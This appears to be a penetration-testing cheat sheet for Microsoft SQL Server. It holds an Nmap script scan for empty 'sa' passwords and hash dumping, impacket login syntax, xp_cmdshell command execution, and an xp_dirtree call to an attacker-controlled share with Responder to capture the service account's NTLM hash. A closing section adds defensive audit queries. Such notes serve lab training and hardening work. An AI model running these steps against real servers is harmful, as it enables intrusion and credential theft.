# Footprinting
Nmap MSSQL Script Scan
```bash
sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 10.129.201.248
```
Connecting with Mssqlclient.py
```bash
# Syntax: mssqlclient.py [<domain>/]<user>[:<password>]@<target-IP>
# -windows-auth selects Windows (NTLM) authentication instead of SQL-login auth.
# <user> and <target-IP> are placeholders; fill in the account and host being tested.
python3 mssqlclient.py <user>@<target-IP> -windows-auth
# Same tool as packaged on Kali/Parrot; the part after @ is the target host, not the domain
impacket-mssqlclient <domain>/<username>:<password>@<target-IP>
```
# Commands
```sql
-- List databases (any of the three works; the last is the legacy compatibility view)
select * from sys.databases;
select name from sys.databases;
select name from master..sysdatabases;
-- Switch to a database
use <DB>;
-- List tables in the current database
select * from sys.tables;
select name from sys.tables;
-- Dump a table
select * from <table>;
-- Column names and data types for one table (TABLE_NAME must be a quoted string)
SELECT COLUMN_NAME, DATA_TYPE
FROM INFORMATION_SCHEMA.COLUMNS
WHERE TABLE_NAME = '<TABLE>';
```
```text
# mssqlclient.py helper commands typed at the SQL> prompt (not raw T-SQL)
xp_cmdshell whoami            # run an OS command; only works after xp_cmdshell is enabled
enable_xp_cmdshell            # wraps sp_configure to switch xp_cmdshell on (needs sysadmin)
xp_dirtree \\<attacker-IP>\fake\share
# T-SQL equivalent: EXEC master..xp_dirtree '\\<attacker-IP>\fake\share'
# The server's service account authenticates to that UNC path; have Responder
# listening on the attacker host first: sudo responder -I tun0
```
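As an added defender-side example (not part of the original notes), the T-SQL below audits the two conditions the scan and helper commands above probe for: whether `xp_cmdshell` is switched on, and whether any SQL login (such as `sa`) has an empty password. It uses only standard system views and procedures; the audit is my own, run as a sysadmin.

```sql
-- Added audit example, not from the original notes. Run as a sysadmin.

-- 1. Is xp_cmdshell enabled? value_in_use = 1 means OS command execution is on.
--    enable_xp_cmdshell in mssqlclient.py flips exactly this setting via sp_configure.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');

-- 2. Turn it back off if it is enabled and not needed.
--    xp_cmdshell is an advanced option, so 'show advanced options' must be on to touch it.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- 3. SQL logins with an empty password (what ms-sql-empty-password tests for sa).
--    PWDCOMPARE compares a cleartext candidate against the stored hash; 1 = match.
SELECT name, is_disabled
FROM sys.sql_logins
WHERE PWDCOMPARE('', password_hash) = 1;

-- 4. Which logins hold sysadmin, the role needed to enable xp_cmdshell at all.
SELECT p.name, p.type_desc
FROM sys.server_principals p
JOIN sys.server_role_members m ON m.member_principal_id = p.principal_id
JOIN sys.server_principals r ON r.principal_id = m.role_principal_id
WHERE r.name = 'sysadmin';
```

Query 1 is the quick check after an engagement: if `value_in_use` is still 1 for `xp_cmdshell`, a tester (or attacker) left it on. Query 3 returning any row is the same finding the Nmap `ms-sql-empty-password` script reports, and query 4 shows the accounts that would be able to reach OS command execution from a SQL session.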